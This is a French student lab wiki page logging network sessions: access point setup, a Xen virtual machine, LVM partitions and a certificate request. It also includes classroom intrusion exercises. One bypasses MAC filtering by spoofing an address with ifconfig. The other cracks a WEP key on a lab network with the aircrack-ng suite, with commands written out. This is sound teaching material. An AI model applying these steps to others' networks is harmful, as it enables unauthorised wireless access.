Cahier groupe n°6 : Différence entre versions

De Wiki d'activités IMA
(Séance 6 (12/11/2015))
(Crackage de clef WEP)
Ligne 96 : Ligne 96 :
 
     openssl req -nodes -newkey rsa:2048 -sha256 -keyout kasteel.lol.key -out kasteel.lol.csr
 
     openssl req -nodes -newkey rsa:2048 -sha256 -keyout kasteel.lol.key -out kasteel.lol.csr
  
==Crackage de clef WEP==
+
===Crackage de clef WEP===
  
 
Activation mode monitor de la carte wifi wlan0:
 
Activation mode monitor de la carte wifi wlan0:

Version du 12 novembre 2015 à 22:45

Présentation du réseau à mettre en place

PRA Network.png

Cahier des charges de la tâche particulière

Présentation de la tâche particulière

La tâche particulière que nous devons effectuer lors de ce projet est la configuration d'un point d'accès Wifi avec filtrage des adresses MAC.

Les différentes étapes à réaliser :

  • Connexion via le port série au point d'accès Cisco
  • Configuration pour le réseau insecure
  • Accès via ethernet
  • Filtrage des adresses Mac via l'interface web pour chaque binôme de la salle E304

Matériel utilisé pour la tâche particulière

Cisco Aironet 2600

Suivi de l'avancement du TP

Séance 1 (01/10/2015)

  • Connexion via le port série au point d'accès Cisco
  • Configuration dans le réseau insecure : ajout de l'adresse IP 172.26.79.10 dans l'interface bvI 1, connexion au réseau de l'école
  • Accès à l'interface web du Cisco, configuration pour le wifi

Séance 2 (08/10/2015)

  • Test d'intrusion par changement d'adresse MAC:
  1. Ajout d'un filtre sur l'adresse MAC de l'eeePC => eeePC bloqué
  2. Changement de l'adresse MAC de l'eeePC => eeePC non bloqué

Conclusion: l'accès au réseau n'est pas suffisamment sécurisé lors d'un filtrage sur adresse MAC

Séance 3 (15/10/2015)

  • Achat du nom de domaine : kasteel.lol
  • Connexion en root à cordouan.insecserv.deule.net:
   ssh root@cordouan.insecserv.deule.net
  • Création de la machine:
   xen-create-image --hostname=KASTEEL --dist=jessie --dir=/usr/local/xen --gateway=193.48.57.174 --ip=193.48.57.166
   --netmask=255.255.255.240 --nameserver=193.48.57.48 --genpass=0 --password="mot de passe administrateur habituel"
  • visualisation des logs de l'installation
   tail -f /var/log/xen-tools/KASTEEL.log
  • Création du fichier de configuration:
   xl create /etc/xen/KASTEEL.cfg
  • Lancement de la machine:
   xl console KASTEEL

Séance 4 (22/10/2015)

  • Ajout d'un SSID:"baguette" au point d'accès Cisco avec un filtrage par adresse MAC de tous les eeePC de la salle E304
  • Configuration des eeePC pour accès au WiFi:
   fichier:/etc/network/interfaces 
   auto wlan0
   iface wlan0 inet static
       wireless-essid baguette
       address 172.26.79.60
       netmask 255.255.240.0
       gateway 172.26.79.254
   fichier:/etc/resolv.conf
   nameserver 193.48.57.48
  • Tentative d'intrusion sur le point d'accès de la salle E306 par changement d'adresse MAC de l'eeePC (réussie):
   ifconfig wlan0 down
   ifconfig wlan0 hw ether xx:xx:xx:xx:xx:xx
   ifconfig wlan0 up

Séance 5 (05/11/2015)

  • Installation des paquets (SSH, Apache et DNS) sur la machine virtuelle.
  • Création des partitions LVM:
   lvcreate -L 10G -n /dev/virtual/ima5-kasteel-home -v
   lvcreate -L 10G -n /dev/virtual/ima5-kasteel-var -v
  • Modification du fichier de configuration pour intégrer ces partitions:
   disk        = [
                  'file:/usr/local/xen/domains/KASTEEL/disk.img,xvda2,w',
                  'file:/usr/local/xen/domains/KASTEEL/swap.img,xvda1,w',
                  'phy:/dev/virtual/ima5-kasteel-home,xvdc,w',
                  'phy:/dev/virtual/ima5-kasteel-var,xvdb,w',
                 ]

Séance 6 (12/11/2015)

  • Réservation du certificat correspondant à kasteel.lol, génération du .csr pour le certificat.
   openssl req -nodes -newkey rsa:2048 -sha256 -keyout kasteel.lol.key -out kasteel.lol.csr

Crackage de clef WEP

Activation mode monitor de la carte wifi wlan0:

   airmon-ng start wlan0


   airmon-ng check kill

Affiche le traffic wifi:

   airodump-ng mon0

Affiche les différents points d'accès sur le canal 7. Le bssid est l'addresse MAC du réseau cracotte06 que nous voulons cracker.

   airodump-ng --essid cracotte06 --write crackage -c 7 --bssid 00:23:5e:1e:05:45

Sur un autre terminal on lance le crackage de la clé:

   aircrack-ng -l  KEY -s -f 15 crackage-01.cap

Finalement on trouve la clé au bout de 14min25s avec plus de 105997 IVs

Références

Information sur le Cisco Aironet

Travaux pratiques de réseau informatique IMA4

Manuel xen-create-image